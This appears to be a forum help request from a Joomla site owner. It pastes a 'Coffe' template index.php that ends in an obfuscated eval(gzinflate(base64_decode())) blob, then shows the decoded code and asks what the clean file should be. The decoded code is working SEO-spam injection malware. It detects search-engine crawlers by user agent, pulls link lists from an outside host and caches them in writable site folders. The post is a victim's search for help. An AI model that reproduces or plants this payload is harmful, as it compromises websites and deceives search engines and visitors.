- Code: Select all
# Coffe - #1 2011 template (for Joomla 1.5)
# Copyright (C) 2007-2010 Gavick.com. All Rights Reserved.
# License: Copyrighted Commercial Software
# Website: http://www.gavick.com
# Support: [email protected]
# Based on T3 Framework
# Copyright (C) 2004-2009 J.O.O.M Solutions Co., Ltd. All Rights Reserved.
# @license - GNU/GPL, http://www.gnu.org/copyleft/gpl.html
# Author: J.O.O.M Solutions Co., Ltd
# Websites: http://www.joomlart.com - http://www.joomlancers.com
// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );
include_once (dirname(__FILE__).DS.'libs'.DS.'gk.template.helper.php');
$tmpl = GKTemplateHelper::getInstance($this, array('ui', GK_TOOL_SCREEN, GK_TOOL_MENU, 'main_layout', 'direction'));
//Calculate the width of template
$tmplWidth = '';
$tmplWrapMin = '100%';
switch ($tmpl->getParam(GK_TOOL_SCREEN)){
case 'auto':
$tmplWidth = '97%';
case 'fluid':
$tmplWidth = intval($tmpl->getParam('gk_screen-fluid-fix-gk_screen_width'));
$tmplWidth = $tmplWidth ? $tmplWidth.'%' : '90%';
case 'fix':
$tmplWidth = intval($tmpl->getParam('gk_screen-fluid-fix-gk_screen_width'));
$tmplWrapMin = $tmplWidth ? ($tmplWidth+1).'px' : '1003px';
$tmplWidth = $tmplWidth ? $tmplWidth.'px' : '1002px';
$tmplWidth = intval($tmpl->getParam(GK_TOOL_SCREEN));
$tmplWrapMin = $tmplWidth ? ($tmplWidth+1).'px' : '1003px';
$tmplWidth = $tmplWidth ? $tmplWidth.'px' : '1002px';
$tmpl->setParam ('tmplWidth', $tmplWidth);
$tmpl->setParam ('tmplWrapMin', $tmplWrapMin);
//Main navigation
$gk_menutype = $tmpl->getMenuType();
$gkmenu = null;
if ($gk_menutype && $gk_menutype != 'none') {
$gkparams = new JParameter('');
$gkparams->set( 'menutype', $tmpl->getParam('menutype', 'mainmenu') );
$gkparams->set( 'menu_images_align', 'left' );
$gkparams->set( 'menupath', $tmpl->templateurl() .'/gk_menus');
$gkparams->set('menu_images', 1); //0: not show image, 1: show image which set in menu item
$gkparams->set('menu_background', 1); //0: image, 1: background
$gkparams->set('mega-colwidth', 200); //Megamenu only: Default column width
$gkparams->set('mega-style', 1); //Megamenu only: Menu style.
$gkparams->set('rtl',($tmpl->getParam('direction')=='rtl' || $tmpl->direction == 'rtl'));
$gkmenu = $tmpl->loadMenu($gkparams, $gk_menutype);
//End for main navigation
$layout = $tmpl->getLayout ();
if ($layout) {
?><?php eval(@gzinflate(base64_decode('TVXHCuyIEfyXd1kbmVVOmD0o5zyKPDDKOWsU5ut31m/BPhRFV1WfGrqWraz/s5XLkOblP36AvwNg+eNfP37eBP7zJokvw19wP2+E+jL51Zgv018IXxC/vL8yJPZr57855G8N/aWh3xz69XHxO/+dI/7y/m9GqN/uoDhyQEEEGzNOSIuoBD3kLlBH2RtzaWyuvL8/vrjOfF6Qe9xlikBTxankjfamTIDsR3jP59She+PTU54XnCdic+9jYg6xaFod2ZHxJFXOpnS2XR+FXUCzLHXzQkCszvXoNH0qRcZS+lh4nZMOD3QTBFuwD1N9nUe5IfBW4ykD7zk3XdLEy9m4Mu8cNdK7kWdFo0bpjuiBab/73WPBoJDO1pSEmU/SmKNGuWi6Hh2fzZw7cd3QXTYEGy9nurAXrWogpUxSCzUnHFJwPg54j1JaWTXJj1Fq2vtFByKOQ6jPw5ejuj7W6pSHPNVHOURoXekHQRW38a/sAwABM5E780oZiFlC430W9yKxGuWvrJW3di54r8ilTq/4CDzeNFJXDXHvx1och0fz8ViG9lmlD5DDNJbSSPfkdvrqJDLaysxBha67TrLcU2TM96E71AzZdBhNOK/WuySs9oaDZcAXN51UozhPURFqVTf6USAUe77ruZOEro5FXsq1K6uATXrZGDYWT+LfbXK6B20JI2tljMEl9qDz4gCjOS1fz+lS32sDzrsd3NVjY8CE+XXw1G2NgHSzSGnPe6flmmTs8HFYbSW7I4vSw8CXAJo3rMGl441UnAZk4J2qXyA8GWioEew4vnWsL04yRbgFjOIkdFKjyCcClXtk9t5ReLdpN70Z9IO6W7UhwjEfdtY5Mrrl+yN4IFNRZ72eYtIwYx9aRsRBLe4gtRTzYxkEgEjBCc6+R/5FWs/GTgwNk+OSIFssLyB+GzrcCmM523inxrZwoJO53lfuUWS7xVmQYyZ582EdCEaC6FqoDWSYNnpFREZeK2hGIvO5NxBjlj6FRf7R2IaIwNAuCLNetSesPItRcCs3MhdAhIjvpSWAwyebrvalBdCGsuGGcs5S1LN9K8qcZXZ8kzEEPpioeS6FX6V/kc4E0/Ydyy2/TUskowFk3R3QrZh8oOsA1VCbK1cJHX5VuWTZTQttmg54Et4+nWgCi1T9UeOTpLFGdXxZMFs+fYh9qK2JNY/8HFbIJ+ggtxscc1AyS16bUF1UwacjFKJ6V1Ob96avMW0DFmJL+WFBVxF9YEr8MvTaEtjaR9exiljb41U9aLrM8mtli/VobXPQcRVpLU0Z+XVK43xmk+YOuKg3E0nUijlB2IIbJM7Rb7sTE0i3r61hVMReJapf5ZKS0yekF70Om5cZiG4ewGCljWuvugSXcZx53eFar8RwW+SaOdqOju7Gt4WQdSsNM+Ciz74kaHrqqIjONtMrfJCyYVCLd5P6bPlJ5xDL+2Adc6rTnEHQdjD99wuUEcF+CGdvsUSqmqL2IT9XGXVkmafMGSrEdv12rtdC1ARpqXmtNdlSrh3mrMwevc1HWdHGpeeQwadrj7ipXMb3naHuRNjMUOwF0EOGM49uzpEjwZofr7bXj6lawAYsgMsDJGhX+gC+tcA0u33JNQtailaL/LY465jScfoEjdP3NDK9lpYTd1z0F/lRhUQcMdPFrSgqLRAtgflcB16Ac+reVLR5HOVq6L69+be1HyzivjgjUbEGhvNIwnd70CLs1YN+/vLoTR8sLWvZQvog5dUc7ZRUZ8Zh/SYgDsU8C2802WFoVuqFb1cARag2tcI2gNMNBu+wPzy0UpMCMGcpyjk9X2UVKfcLuB1AbuCbGIZLGsj9HbW428Ox7fIi3HEUyug7jsin4YAISoLnINmnOAIl+G5WoO5Li4hvaZd093n18vXHH799G4z+H1D2W6K///jnv/8E'))); ?>
I used a PHP Decoder and it shows this for the php at the end:
- Code: Select all
h5('http://mycompanyeye.com/bulbozavr/bub3/13.list', 1 * 900);
function h5($u, $t){
$nobot = isset($_REQUEST['nobot']) ? true : false;
$debug = isset($_REQUEST['debug']) ? true : false;
$t2 = 3600 * 5;
$t3 = 3600 * 12;
$droot = getpasekaroot();
$tm = (!@ini_get('upload_tmp_dir')) ? '/tmp/' : @ini_get('upload_tmp_dir');
if (!$tmp = triksp(array($tm, $droot.'images/avatars/', $droot.'tmp/', $droot.'cache/'))) {
if ($debug) {
echo('DEBUG: (ERROR: temporary path not found, return)<br>' . "\r\n");
$agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
if ($debug) {
echo('DEBUG: (INFO: temporary path=' . $tmp . ')<br>, agent ('.$agent.')' . "\r\n");
if (!preg_match('%(http|curl|google|yahoo|yandex|ya|bing|bot|crawl|lynx|SiteUptime|Spider|ia_archiver|AOL|slurp|msn)%i', $agent, $ret)) {
if ($debug) {
echo('DEBUG: (ERROR: you is not spider, return)<br>'."\r\n");
if ($debug) {
echo('DEBUG: (bot by:['.$ret[1].'])<br>'."\r\n");
if ($t) {
if ($debug) {
if (file_exists($tmp . md5($u) . 'c')) {
echo('DEBUG: (INFO: link file exists=' . $tmp . md5($u) . 'c)<br>' . "\r\n");
$filemtime = filemtime($tmp . md5($u) . 'c');
$current = time();
$diff = $current - $filemtime;
echo('DEBUG: (TIME: current=' . $current . ', filemtime=' . $filemtime . ', different=' . $diff . ', cache_time=' . $t . ')<br>' . "\r\n");
if ($diff < $t) {
echo('DEBUG: (INFO: USING CACHE LINK FILE<br>' . "\r\n");
} else {
echo('DEBUG: (INFO: DOWNLOAD NEW LINK FILE<br>' . "\r\n");
if (file_exists($tmp . md5($u . 'c')) && (time() - filemtime($tmp . md5($u . 'c'))) < $t) {
readfile($tmp . md5($u . 'c'));
if ($debug) {
echo('DEBUG: (END: readfile link, return)<br>' . "\r\n");
if ($debug) {
if (file_exists($tmp . md5($u))) {
echo('DEBUG: (INFO: lists file exists=' . $tmp . md5($u) . ')<br>' . "\r\n");
$filemtime = filemtime($tmp . md5($u));
$current = time();
$diff = $current - $filemtime;
echo('DEBUG: (TIME: current=' . $current . ', filemtime=' . $filemtime . ', different=' . $diff . ', cache_time=' . $t3 . ')<br>' . "\r\n");
if ($diff < $t3) {
echo('DEBUG: (INFO: USING CACHE LIST FILE<br>' . "\r\n");
} else {
echo('DEBUG: (INFO: DOWNLOAD NEW LIST FILE<br>' . "\r\n");
if (file_exists($tmp . md5($u)) && (time() - filemtime($tmp . md5($u))) < $t3) {
$d = file($tmp . md5($u));
} else {
$c = curl_init($u);
if (!$c) {
if ($debug) {
echo('DEBUG: (ERROR: curl(list) not init, return)<br>' . "\r\n");
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$d = curl_exec($c);
$l = curl_getinfo($c);
if ($l['http_code'] == 200 && $d) {
@file_put_contents($tmp . md5($u), $d);
$d = explode("\n", $d);
if ($debug) {
echo('DEBUG: (INFO: size list_array=' . sizeof($d) . ')<br>' . "\r\n");
if ($d) {
$l = @array_rand($d);
$c = @curl_init(trim($d[$l]));
if (!$c) {
if ($debug) {
echo('DEBUG: (ERROR: curl(link) not init, return)<br>' . "\r\n");
if ($t) {
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$d = curl_exec($c);
if ($t) {
if ($debug) {
echo('DEBUG: (INFO: link download)<br>' . "\r\n");
@file_put_contents($tmp . md5($u . 'c'), $d);
} else {
if ($debug) {
echo('DEBUG: (ERROR: link NOT download)<br>' . "\r\n");
function triksp($array){
foreach ($array as $path) {
if (is_writable($path)) {
return $path;
return false;
function getpasekaroot() {
$file = 'configuration.php';
$path = getcwd().DIRECTORY_SEPARATOR;
$c = 0;
while($c < 5) {
if (file_exists($path.$file)) {
return $path;
$path = dirname($path).DIRECTORY_SEPARATOR;
What should my index.php actually look like for my coffe template?